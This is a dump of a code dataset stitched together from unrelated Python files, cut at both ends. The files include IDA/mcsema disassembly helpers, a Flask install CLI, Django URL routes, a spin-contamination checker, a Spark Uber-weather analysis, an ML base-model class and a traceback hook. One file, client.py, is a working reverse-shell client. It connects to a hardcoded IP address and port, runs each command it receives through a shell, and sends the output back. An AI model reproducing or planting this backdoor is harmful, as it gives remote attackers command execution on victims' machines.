One result is that we should find\n # and identify jump tables, which we need to do so that we don't incorrectly\n # categorize some things as strings.\n for seg_ea in seg_eas:\n seg_name = idc.SegName(seg_ea)\n seg_end_ea = idc.SegEnd(seg_ea)\n if is_code(seg_ea):\n DEBUG(\"Looking for instructions in segment {}\".format(seg_name))\n DEBUG_PUSH()\n decode_segment_instructions(seg_ea, binary_is_pie)\n DEBUG_POP()\n else:\n DEBUG(\"Looking for strings in segment {} [{:x}, {:x})\".format(\n seg_name, seg_ea, seg_end_ea))\n DEBUG_PUSH()\n find_missing_strings_in_segment(seg_ea, seg_end_ea)\n DEBUG_POP()\n\n # Now go through through the data segments and find missing cross-references.\n for seg_ea in seg_eas:\n seg_name = idc.SegName(seg_ea)\n seg_end_ea = idc.SegEnd(seg_ea)\n DEBUG(\"Looking for cross-references in segment {} [{:x}, {:x})\".format(\n seg_name, seg_ea, seg_end_ea))\n\n DEBUG_PUSH()\n if is_code(seg_ea):\n find_missing_xrefs_in_code_segment(seg_ea, seg_end_ea, binary_is_pie)\n else:\n find_missing_xrefs_in_segment(seg_ea, seg_end_ea, binary_is_pie)\n DEBUG_POP()\n\n # Okay, hopefully by this point we've been able to introduce more information\n # so that IDA can better find references. We'll enable caching of instruction\n # references from now on so that we don't need to repeat too much work.\n enable_reference_caching()\n","sub_path":"tools/mcsema_disass/ida/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":12419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"99402756","text":"import platform\nimport os\nimport click\nimport csv\nfrom shutil import copyfile\nfrom config import basedir\nfrom app.core.models import CoreModel, CoreModule\nfrom app import MODULES\nfrom app import db\nfrom . import bp_core\nfrom .models import CoreCity,CoreProvince\nfrom app.auth.models import User, Role\n\n\n\ndef core_install():\n \"\"\"\n Tatanggap to ng list ng modules tapos iinsert nya sa database yung mga models o tables nila, \\\n para malaman ng system kung ano yung mga models(eg. 
Users,Customers)\n Parameters\n ----------\n modules\n Listahan ng mga modules na iinstall sa system\n \"\"\"\n\n print(\"Installing...\")\n\n try:\n\n if platform.system() == \"Windows\":\n provinces_path = basedir + \"\\\\app\" + \"\\\\core\" + \"\\\\csv\" + \"\\\\provinces.csv\"\n cities_path = basedir + \"\\\\app\" + \"\\\\core\" + \"\\\\csv\" + \"\\\\cities.csv\"\n elif platform.system() == \"Linux\":\n provinces_path = basedir + \"/app/core/csv/provinces.csv\"\n cities_path = basedir + \"/app/core/csv/cities.csv\"\n else:\n raise Exception(\"Platform not supported yet.\")\n \n module_count = 0\n\n homebest_module = None\n\n for module in MODULES:\n # TODO: Iimprove to kasi kapag nag error ang isa damay lahat dahil sa last_id\n homebest_module = CoreModule.objects(name=module.module_name).first()\n # last_id = 0\n if not homebest_module:\n new_module = CoreModule(\n name=module.module_name,\n short_description=module.module_short_description,\n long_description=module.module_long_description,\n status='installed',\n version=module.version\n ).save()\n\n homebest_module = new_module\n \n print(\"MODULE - {}: SUCCESS\".format(new_module.name))\n # last_id = new_module.id\n\n model_count = 0\n\n for model in module.models:\n homebestmodel = CoreModel.objects(name=model.__amname__).first()\n\n if not homebestmodel:\n new_model = CoreModel(\n name=model.__amname__,\n module=homebest_module,\n description=model.__amdescription__,\n ).save()\n\n print(\"MODEL - {}: SUCCESS\".format(new_model.name))\n\n model_count = model_count + 1\n\n if len(module.no_admin_models) > 0 :\n\n for xmodel in module.no_admin_models:\n homebestmodel = CoreModel.objects(name=xmodel.__amname__).first()\n \n if not homebestmodel:\n new_model = CoreModel(\n name=xmodel.__amname__, \n module=homebest_module,\n description=xmodel.__amdescription__,\n admin_included=False\n ).save()\n\n print(\"MODEL - {}: SUCCESS\".format(new_model.name))\n\n module_count = module_count + 1\n\n print(\"Inserting provinces to database...\")\n if CoreProvince.objects.count() < 88:\n with open(provinces_path) as f:\n csv_file = csv.reader(f)\n\n for id, row in enumerate(csv_file):\n if not id == 0:\n CoreProvince(\n name=row[2]\n ).save()\n\n print(\"Provinces done!\")\n\n else:\n print(\"Provinces exists!\")\n print(\"\")\n print(\"Inserting cities to database...\")\n \n if CoreCity.objects.count() < 1647:\n with open(cities_path) as f:\n csv_file = csv.reader(f)\n\n for id,row in enumerate(csv_file):\n if not id == 0:\n \n CoreCity(\n name=row[2]\n ).save()\n\n print(\"Cities done!\")\n else:\n print(\"Cities exists!\")\n\n print(\"Inserting system roles...\")\n if Role.objects.count() > 0:\n print(\"Role already inserted!\")\n else:\n Role(\n name=\"Admin\",\n ).save()\n \n print(\"Admin role inserted!\")\n\n if not User.objects.count() > 0:\n print(\"Creating a SuperUser/owner...\")\n _create_superuser()\n\n except Exception as exc:\n print(str(exc))\n return False\n\n return True\n\n\n@bp_core.cli.command('create_superuser')\ndef create_superuser():\n _create_superuser()\n\n\n@bp_core.cli.command(\"create_module\")\n@click.argument(\"module_name\")\ndef create_module(module_name):\n try:\n\n if platform.system() == \"Windows\":\n module_path = basedir + \"\\\\app\" + \"\\\\\" + module_name\n templates_path = basedir + \"\\\\app\" + \"\\\\\" + module_name + \"\\\\\" + \"templates\" + \"\\\\\" + module_name \n core_init_path = basedir + \"\\\\app\" + \"\\\\core\" + \\\n \"\\\\module_template\" + \"\\\\__init__.py\"\n core_models_path 
= basedir + \"\\\\app\" + \\\n \"\\\\core\" + \"\\\\module_template\" + \"\\\\models.py\"\n core_routes_path = basedir + \"\\\\app\" + \\\n \"\\\\core\" + \"\\\\module_template\" + \"\\\\routes.py\"\n elif platform.system() == \"Linux\":\n module_path = basedir + \"/app\" + \"/\" + module_name\n templates_path = basedir + \"/app\" + \"/\" + module_name + \"/templates\" + \"/\" + module_name\n core_init_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/__init__.py\"\n core_models_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/models.py\"\n core_routes_path = basedir + \"/app\" + \"/core\" + \"/module_template\" + \"/routes.py\"\n else:\n raise Exception\n \n core_file_list = [core_init_path, core_models_path, core_routes_path]\n\n if not os.path.exists(module_path):\n os.mkdir(module_path)\n os.makedirs(templates_path)\n for file_path in core_file_list:\n file_name = os.path.basename(file_path)\n copyfile(file_path, os.path.join(module_path, file_name))\n except OSError as e:\n print(\"Creation of the directory failed\")\n print(e)\n else:\n print(\"Successfully created the directory %s \" % module_path)\n\n\n@bp_core.cli.command(\"install\")\ndef install():\n\n if core_install():\n print(\"Installation complete!\")\n\n else:\n print(\"Installation failed!\")\n\n\ndef _create_superuser():\n try:\n role = Role.objects(name=\"Admin\").first()\n\n user = User(\n fname=\"Administrator\",\n lname=\"Administrator\",\n username = input(\"Enter Username: \"),\n email = None,\n is_superuser = 1,\n role=role,\n created_by = \"System\",\n )\n user.set_password(input(\"Enter password: \"))\n user.save()\n print(\"SuperUser Created!\")\n except Exception as exc:\n print(str(exc))\n","sub_path":"app/core/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"434571124","text":"import os\r\nimport socket\r\nimport subprocess\r\n\r\n\r\ns = socket.socket()\r\nhost = '192.168.10.155' # Server ip\r\nport = 9999\r\n\r\ns.connect((host,port))\r\n\r\n\r\nwhile True:\r\n\tdata = s.recv(1024)\r\n\tif data[:2].decode(\"utf-8\") == \"cd\": # if first 2 chars of command = cd as it does not return anything\r\n\t\tos.chdir(data[3:].decode(\"utf-8\"))\r\n\r\n\tif len(data) > 0:\r\n\t\tcmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell= True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) # Run Command in the terminal\r\n\t\t# only : no number means whole command \r\n\t\toutput_bytes = cmd.stdout.read() + cmd.stderr.read()\r\n\t\toutput_str = str(output_bytes, \"utf-8\")\r\n\t\t# prints out the prompt\r\n\t\ts.send(str.encode(output_str + str(os.getcwd()) + \"> \"))\r\n\t\tprint(output_str) # Results on the clients machine\r\n\r\n# Close Connection\r\ns.close()\r\n\r\n\r\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"518246454","text":"from django.urls import include, path\nfrom hb_app import views\n\nurlpatterns = [\n #views.index because we called the function index\n path('', views.index, name='index'),\n path('png',views.png, name='png'),\n #happy budget stuff\n path('accounts',views.accounts, name='accounts'),\n path('finances',views.finances, name='finances'),\n path('newTransaction', views.addTransaction),\n path('home',views.home, name='home'),\n path('login',views.login, 
name='login'),\n\n path('signUp', views.signUp, name = 'signUp'),\n path('processSignUp', views.processSignUp, name = 'processSignUp'),\n path('processLogin', views.processLogin, name = 'processLogin'),\n path('processLogOut', views.processLogOut, name = 'processLogOut'),\n\n path('personalGoals',views.personalGoals, name='personalGoals'),\n path('interactivePet',views.interactivePet, name='interactivePet'),\n path('feed/', views.feedGoal, name='feed'),\n path('interactivePet_eating',views.interactivePet_eating, name='interactivePet_eating'),\n #random file to test db connections\n path('dummy',views.dummy, name='dummy'),\n path('new', views.newGoal),\n path('delete/', views.deleteGoal, name='delete'),\n path('invest/', views.investInGoal, name='invest'),\n path('pie-chart/', views.pie_chart, name='pie-chart'),\n]\n","sub_path":"Application/HappyBudget/hb_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"322575293","text":"from pathlib import Path\n\ndef files_in_folder(file_extension):\n# Returns current directory\n p = Path('.')\n# Read in list of files in current directory that have file type file_extension\n a = list(p.glob('*' + file_extension))\n return (a)\n\ndef strip_extension(file_list,file_extension):\n # str.strip() removes a *set of characters* from both ends, not a suffix,\n # so it would mangle names like 'text.txt'; slice the suffix off instead.\n file_list = [str(x)[:-len(file_extension)] if str(x).endswith(file_extension) else str(x) for x in file_list]\n return file_list\n\n\nfile_type = '.txt'\nunstripped_list = files_in_folder(file_type)\nstripped_list = strip_extension(unstripped_list,file_type)\nprint(stripped_list)","sub_path":"src/FileFinder.py","file_name":"FileFinder.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469701744","text":"#!/usr/bin/env python3\n\n# MIT License\n# \n# Copyright (c) 2021, Alex M. Maldonado\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport json\nimport numpy as np\nfrom qa_tools.utils import calc_spin\n\ndata_dir = '../../qa-atoms-data/data'\n\nonly_filename = True # Instead of printing the absolute path, we print just the filename.\nspin_deviation = 0.2 # Minimum spin deviation to consider \"contaminated\".\n\n# Lambda selection. 
Allows you to only check certain lambdas for convergence.\n# Note that both options can be True at the same time.\nonly_fin_diff_lambdas = True # Only check calculations for lambdas used in finite differences.\nonly_int_lambdas = True # Only check calculations for integer lambdas.\n\nmax_fin_diff = 0.02 # The maximal lambda value used for finite differences.\n\n\n### SCRIPT ###\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\ndef get_files(path, expression, recursive=True):\n \"\"\"Returns paths to all files in a given directory that matches a provided\n expression in the file name. Commonly used to find all files of a certain\n type, e.g. output or xyz files.\n \n Parameters\n ----------\n path : :obj:`str`\n Specifies the directory to search.\n expression : :obj:`str`\n Expression to be tested against all file names in 'path'.\n recursive :obj:`bool`, optional\n Recursively find all files in all subdirectories.\n \n Returns\n -------\n :obj:`list` [:obj:`str`]\n All absolute paths to files matching the provided expression.\n \"\"\"\n if path[-1] != '/':\n path += '/'\n if recursive:\n all_files = []\n for (dirpath, _, filenames) in os.walk(path):\n index = 0\n while index < len(filenames):\n if dirpath[-1] != '/':\n dirpath += '/'\n filenames[index] = dirpath + filenames[index]\n index += 1\n all_files.extend(filenames)\n files = []\n for f in all_files:\n if expression in f:\n files.append(f)\n else:\n files = []\n for f in os.listdir(path):\n filename = os.path.basename(f)\n if expression in filename:\n files.append(path + f)\n return files\n\ndef read_json(json_path):\n \"\"\"Read JSON file.\n \n Parameters\n ----------\n json_path : :obj:`str`\n Path to json file.\n \n Returns\n -------\n :obj:`dict`\n Contents of JSON file.\n \"\"\"\n with open(json_path, 'r') as reader:\n json_dict = json.load(reader)\n \n return json_dict\n\n\n\n\ndef main():\n \n # Finds all QCJSON files in data directory.\n all_output_paths = get_files(data_dir, '.json', recursive=True)\n high_spin_contam_labels = []\n high_spin_errors = []\n lambda_high_spin_errors = []\n n_unrestricted = 0\n\n # Loops through all QCJSON files and adds QATS information.\n for json_path in all_output_paths:\n json_dict = read_json(json_path)\n multiplicity = json_dict['molecular_multiplicity']\n spin_expected = ((multiplicity - 1)/2)\n\n # Selecting which lambda values to check\n l_values = json_dict['qa_lambdas']\n bool_idx = [True for _ in l_values] # Initial values\n if only_fin_diff_lambdas:\n for i in range(len(l_values)):\n if abs(l_values[i]) <= max_fin_diff:\n bool_idx[i] = True\n else:\n bool_idx[i] = False\n if only_int_lambdas:\n for i in range(len(l_values)):\n if l_values[i].is_integer():\n bool_idx[i] = True\n else:\n if not abs(l_values[i]) <= max_fin_diff and only_fin_diff_lambdas:\n bool_idx[i] = False\n \n if 'scf_spin_squared' in json_dict.keys():\n n_unrestricted += 1\n if 'cc_spin_squared' in json_dict.keys():\n spin_squared_observed = np.array(json_dict['cc_spin_squared'])[bool_idx]\n else:\n spin_squared_observed = np.array(json_dict['scf_spin_squared'])[bool_idx]\n spin_error = np.array(\n [calc_spin(i) - spin_expected for i in spin_squared_observed if i is not None]\n )\n if np.any(spin_error[spin_error>spin_deviation]):\n if only_filename:\n json_name = json_path.split('/')[-1]\n else:\n json_name = json_path\n high_spin_contam_labels.append(json_name)\n\n bool_idx_high_spin_error = [True if i > spin_deviation else False for i in spin_error]\n 
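`calc_spin` is imported from `qa_tools` and its source is not shown here. A plausible stand-in, assuming it recovers the spin quantum number S from an observed ⟨S²⟩ via S(S+1) = ⟨S²⟩, makes the spin-error arithmetic above concrete; this reconstruction is an assumption, not the package's actual code:

```python
import math

def calc_spin(spin_squared):
    # Solve S * (S + 1) = <S^2> for S (positive root of the quadratic).
    return 0.5 * (-1.0 + math.sqrt(1.0 + 4.0 * spin_squared))

multiplicity = 2                       # a doublet
spin_expected = (multiplicity - 1) / 2 # S = 0.5, so the ideal <S^2> is 0.75
observed_s2 = 0.9823                   # a lightly contaminated <S^2>
error = calc_spin(observed_s2) - spin_expected
print(round(error, 4), error > 0.2)    # ~0.11, below the 0.2 threshold
```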
high_spin_errors.append(spin_error[bool_idx_high_spin_error])\n lambda_high_spin_errors.append(np.array(l_values)[bool_idx][bool_idx_high_spin_error])\n \n\n \n print(f'The following calculations had high spin contamination (above {spin_deviation}):\\n')\n for json_name,high_spin_error,high_l_values in zip(high_spin_contam_labels, high_spin_errors, lambda_high_spin_errors):\n print(json_name)\n print(f'Lambda values: {high_l_values}')\n print(f'Spin errors: {high_spin_error} out of {len(spin_error)}')\n print()\n print(f'\\n{len(high_spin_errors)} calcs have high spin contamination out of {n_unrestricted} calcs.')\n \n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/check-spin-contam-json.py","file_name":"check-spin-contam-json.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189089595","text":"\n\nweather = sc.textFile(\"uber_weather.csv\")\n\nweather = weather.filter(lambda x: x!= 'datetime,lat,lng,base,humidity,wind,temp,description')\n\n\ndef clean_weather(line):\n return line.split(\",\")\n\nweather_clean = weather.map(clean_weather)\n\nfrom datetime import date\nimport datetime\nfrom dateutil import parser\n\ndef fix_time(line):\n return(parser.parse(line[0]), line[1], line[2], line[3], line[4], line[5], line[6], line[7])\n\nweather = weather_clean.map(fix_time)\n\ndef adddays(line):\n return line[0], line[0].day, line[0].month, line[1], line[2], line[3], line[4], line[5], line[6], line[7]\n\nweather_days = weather.map(adddays)\n\n\ndef rain(line):\n if line[9] == \"scattered clouds\" or line[9] == \"sky is clear\" or line[9] == \"broken clouds\" or line[9] == \"haze\" or line[9] == \"few clouds\" or line[9] == \"overcast clouds\" or line[9] == \"mist\" or line[9] == \"fog\" or line[9] == \"dust\" or line[9] == \"smoke\":\n dummy = \"no rain\"\n else:\n dummy = \"rain\"\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], line[8], line[9], dummy\n\n\nweather_days_rain = weather_days.map(rain)\n\ndef floater(line):\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], float(line[8]), line[9], line[10] \n\n\nweather1 = weather_days_rain.map(floater)\n\n##############################################\n\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nimport geopandas as gpd\nimport fiona as fiona\n\n#getting lat and long in proper format\ndef latlong(line):\n new = float(line[4]), float(line[3])\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], float(line[8]), line[9], line[10], new\n\nlatlong = weather1.map(latlong)\n\ndef point(line):\n poly = gpd.GeoDataFrame.from_file('geo_export_b697b323-ce5d-4268-8623-7712a657fd85.shp')\n point = Point(line[11])\n if poly.contains(point)[0] == True:\n boro = \"Bronx\"\n if poly.contains(point)[1] == True:\n boro = \"Staten Island\"\n if poly.contains(point)[2] == True:\n boro = \"Brooklyn\"\n if poly.contains(point)[3] == True:\n boro = \"Queens\"\n if poly.contains(point)[4] == True:\n boro = \"Manhattan\"\n else:\n boro = \"Other\"\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], line[8], line[9], line[10],line[11], boro\n\nlatlongagain = latlong.map(point)\n\n##############################################\n\n\nweather_df = latlongagain.toDF()\n\n\nweather_df = weather_df.selectExpr(\"_1 as datetime1\", \"_2 as day\", \"_3 as month\", \"_4 as lat\", \"_5 as lng\", \"_6 as base\", \"_7 as 
humidity\", \"_8 as wind\", \"_9 as temp\", \"_10 as desc\", \"_11 as rain\", \"_12 as latlng\", \"_13 as borough\")\nweather_df.show(5)\n\n\nweather_df.createOrReplaceTempView(\"uber2014\")\n\nbor_rain = sqlContext.sql(\"select borough, day, month, rain, count(rain) number_trips from uber2014 group by day, month, borough, rain order by day desc\")\ntest = sqlContext.sql(\"select day, month, rain, count(rain) number_trips from uber2014 group by day, month, rain order by day desc\")\ntest.createOrReplaceTempView(\"counttrips\")\nbor_rain.createOrReplaceTempView(\"counttrips_borough\")\n\naverage_trips_per_day = sqlContext.sql(\"select mean(number_trips) mean_num_trips from counttrips\")\naverage_trips_per_day_with_rain = sqlContext.sql(\"select rain, mean(number_trips) mean_num_trips from counttrips group by rain\")\naverage_trips_per_month_with_rain = sqlContext.sql(\"select month, rain, mean(number_trips) mean_num_trips from counttrips group by month, rain order by month desc\")\n\naverage_trips_per_month_with_rain.show(5)\n\n\n\n\n\n","sub_path":"weather_time_cleaned.py","file_name":"weather_time_cleaned.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"539325658","text":"import logging\nimport os\nfrom configuration import model_dir\nimport joblib\nimport datetime as dt\nfrom src.utils.base_model import load_model\nimport shap\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score\n\nlogger = logging.getLogger('XGBoostModel')\n\nclass Model:\n \"\"\"Anything that can be used by all models goes in this class\"\"\"\n def __init__(self):\n self.params = None\n self.trained_model = None\n self.model_type = None\n self.model_id = None\n self.param_grid = None\n self.model_object = None\n self.performance_metrics = [accuracy_score]\n self.scoring = 'accuracy'\n\n def get_data(self, X):\n \"\"\"Get model features, given a DataFrame of match info\"\"\"\n pass\n\n def train_model(self, X, y):\n pass\n\n def optimise_hyperparams(self, X, y, param_grid=None):\n \"\"\"Hyperparameter optimisation function using GridSearchCV. Works for any sklearn models\"\"\"\n logger.info(\"Optimising hyper-parameters\")\n param_grid = self.param_grid if param_grid is None else param_grid\n # Split data into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n model = self.model_object()\n clf = GridSearchCV(model, param_grid, verbose=1, scoring=self.scoring, n_jobs=1)\n clf.fit(X_train, y_train)\n # Train a second model using the default parameters\n clf2 = self.model_object(params=self.params)\n clf2.fit(X_train, y_train)\n # Compare these params to existing params. 
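The Spark SQL above averages daily trip counts by rain flag. The same aggregation in plain pandas, on a made-up frame, shows the shape of the result without needing a Spark session:

```python
import pandas as pd

trips = pd.DataFrame({
    'day':   [1, 1, 2, 2, 3, 3],
    'month': [4, 4, 4, 4, 4, 4],
    'rain':  ['rain', 'no rain', 'rain', 'no rain', 'rain', 'no rain'],
    'number_trips': [120, 300, 90, 280, 150, 310],
})

# Equivalent of: select rain, mean(number_trips) from counttrips group by rain
print(trips.groupby('rain')['number_trips'].mean())
```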
If they are better, use them.\n # Use the first listed performance metric\n performance_metric = self.performance_metrics[0]\n # Get predictions for the first classifier\n clf_predictions = clf.best_estimator_.predict(X_test)\n clf_performance = performance_metric(y_test, clf_predictions)\n # Get predictions for the second classifierr\n clf2_predictions = clf2.predict(X_test)\n clf2_performance = performance_metric(y_test, clf2_predictions)\n # Compare performance\n if clf2_performance > clf_performance:\n logger.info(\"Hyper-parameter optimisation improves on previous model, \"\n \"saving hyperparameters.\")\n self.params = clf.best_params_\n\n def predict(self, X):\n X = self.preprocess(X)\n return self.trained_model.predict_proba(X) if self.trained_model is not None else None\n\n def preprocess(self, X):\n \"\"\"Apply preprocessing steps to data\"\"\"\n return np.array(X)\n\n def get_training_data(self):\n pass\n\n def save_model(self):\n if self.trained_model is None:\n logger.error(\"Trying to save a model that is None, aborting.\")\n else:\n # Save the model ID inside the model object (so we know which\n # model made which predictions in the DB)\n self.trained_model.model_id = self.model_id\n file_name = self.model_type + '_' + str(dt.datetime.today().date()) + '.joblib'\n save_dir = os.path.join(model_dir, file_name)\n logger.info(\"Saving model to {} with joblib.\".format(save_dir))\n joblib.dump(self.trained_model, open(save_dir, \"wb\"))\n\n def load_model(self, model_type, date=None):\n \"\"\"Wrapper for the load model function in utils\"\"\"\n model = load_model(model_type, date=date)\n if model is None:\n return False\n else:\n # Set the attributes of the model to those of the class\n self.trained_model = model\n self.model_id = self.trained_model.model_id\n self.params = model.get_params()\n return True\n\n @staticmethod\n def get_categorical_features(X):\n \"\"\"Get a list of categorical features in the data\"\"\"\n categoricals = []\n for col, col_type in X.dtypes.iteritems():\n if col_type == 'O':\n categoricals.append(col)\n return categoricals\n\n @staticmethod\n def fill_na_values(self, X):\n \"\"\"Fill NA values in the data\"\"\"\n # ToDo: Add a data structure that specifies how to fill NA's for every column\n pass\n\n @staticmethod\n def get_shap_explainer(model, X, plot_force=False):\n \"\"\"Explain model predictions using SHAP\"\"\"\n explainer = shap.TreeExplainer(model)\n shap_values = explainer.shap_values(X)\n # visualize the first prediction's explanation\n # (use matplotlib=True to avoid Javascript)\n if plot_force:\n shap.force_plot(explainer.expected_value[0], shap_values[0])\n return explainer, shap_values\n","sub_path":"src/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82465466","text":"\"\"\"unittests for analytics.filters.email\"\"\"\n\nimport builtins\nimport pdb\nimport json\nfrom pprint import pprint\nimport unittest\n\nfrom tahoe.tests.identity.test_backend import setUpBackend, tearDownBackend\n\nif __name__ != 'analytics.tests.filters.test_phishtank_feed':\n import sys, os\n J = os.path.join\n sys.path = ['..', J('..','..'), J('..','..','..')] + sys.path\n del sys, os\n\nfrom filters import set_filter_backend, PhishTankFeed\n\n\ndef make_test_data():\n with open('openphish_feed.txt', 'r') as fp:\n builtins.data_str = fp.read()\n\n builtins.orgid = 'ABC123'\n builtins.timezone = 'US/Pacific'\n\ndef 
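`optimise_hyperparams` above wraps sklearn's `GridSearchCV` and keeps the tuned parameters only when they beat the defaults on a held-out split. A compressed, runnable version of that comparison on synthetic data; the model and grid are chosen just for the demo:

```python
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.model_selection import GridSearchCV, train_test_split

X, y = make_classification(n_samples=400, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,
                                                    random_state=0)

grid = GridSearchCV(LogisticRegression(max_iter=1000),
                    {'C': [0.01, 0.1, 1, 10]}, scoring='accuracy')
grid.fit(X_train, y_train)
default = LogisticRegression(max_iter=1000).fit(X_train, y_train)

tuned_acc = accuracy_score(y_test, grid.best_estimator_.predict(X_test))
default_acc = accuracy_score(y_test, default.predict(X_test))
# Keep the tuned parameters only if they actually improve on the defaults.
params = grid.best_params_ if tuned_acc >= default_acc else default.get_params()
print(tuned_acc, default_acc)
```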
delete_test_data():\n del builtins.data_str, builtins.orgid, builtins.timezone\n\n\ndef setUpModule():\n builtins._backend = setUpBackend()\n set_filter_backend(_backend)\n \n\ndef tearDownModule():\n tearDownBackend(_backend)\n del builtins._backend\n\n\nclass CowireTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n _backend.drop()\n make_test_data()\n\n @classmethod\n def tearDownClass(cls):\n delete_test_data()\n\n def test_01(self):\n lines = data_str.split('\\n')\n c = PhishTankFeed()\n d = json.dumps({'data': data_str})\n raw_ref = c.parse(d, orgid, timezone)\n \n if raw_ref == False:\n return\n\n e = _backend.find_one({'itype':'event', '_hash':{'$in':raw_ref}})\n pprint(e)\n pdb.set_trace()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/filters/test_phishtank_feed.py","file_name":"test_phishtank_feed.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"523161203","text":"import os\r\nimport sys\r\nfrom typing import NoReturn\r\n\r\nfrom traceback_with_variables.core import iter_tb_lines\r\n\r\n\r\ndef override_print_tb(\r\n max_value_str_len: int = 1000,\r\n max_exc_str_len: int = 10000,\r\n ellipsis_: str = '...',\r\n num_context_lines: int = 1,\r\n activate_by_env_var: str = '',\r\n deactivate_by_env_var: str = '',\r\n) -> NoReturn:\r\n if (activate_by_env_var and not os.getenv(activate_by_env_var, '')) or \\\r\n (deactivate_by_env_var and os.getenv(deactivate_by_env_var, '')):\r\n return sys.excepthook\r\n\r\n def excepthook(\r\n e_cls, # noqa\r\n e,\r\n tb\r\n ):\r\n for line in iter_tb_lines(\r\n e=e,\r\n tb=tb,\r\n num_context_lines=num_context_lines,\r\n max_value_str_len=max_value_str_len,\r\n max_exc_str_len=max_exc_str_len,\r\n ellipsis_=ellipsis_,\r\n ):\r\n sys.stderr.write(line)\r\n sys.stderr.write('\\n')\r\n\r\n sys.stderr.flush()\r\n\r\n sys.excepthook = excepthook\r\n","sub_path":"traceback_with_variables/override.py","file_name":"override.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364874625","text":"from Data.parameters import Data\nfrom keycloak_funcs import keyData\nfrom reuse_func import GetData\nfrom selenium import webdriver\n\n\nclass CqubeAdminSetting():\n def __init__(self,driver,file):\n self.driver=driver\n self.file=file\n\n def check_cqube_admin_setting(self):\n cal = keyData()\n cal.navigate_to_clients(self.driver)\n json_cqube_admin_client=cal.check_clients(self.file,'cqube_admin')\n cal.click_on_cqube_admin(self.driver)\n cal.click_on_settings(self.driver)\n keycloack_cqube_admin_client=cal.check_setting(self.driver)\n cal.click_on_client_scopes(self.driver)\n return json_cqube_admin_client,keycloack_cqube_admin_client\n","sub_path":"KeyCloak/Clients/check_cqube_admin_settings.py","file_name":"check_cqube_admin_settings.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"407477236","text":"import pystan\n\n#random linear treatment effects with known variance\nschools_code = \"\"\"\ndata { //this block defines the data that the user inputs\n int J; // number of schools\n vector[J] y; // estimated treatment effects\n vector[J] sigma; // s.e. 
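The `traceback_with_variables` override above works by swapping in a custom `sys.excepthook`. The mechanism itself fits in a few lines; this sketch prints a terse one-line report instead of the variable-rich traceback that library produces:

```python
import sys

def brief_excepthook(exc_type, exc, tb):
    # Replace the default traceback printout with a one-line summary.
    sys.stderr.write('{}: {}\n'.format(exc_type.__name__, exc))

sys.excepthook = brief_excepthook

# Deliberately uncaught, so the custom hook fires when run as a script.
raise ValueError('demonstration failure')
```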
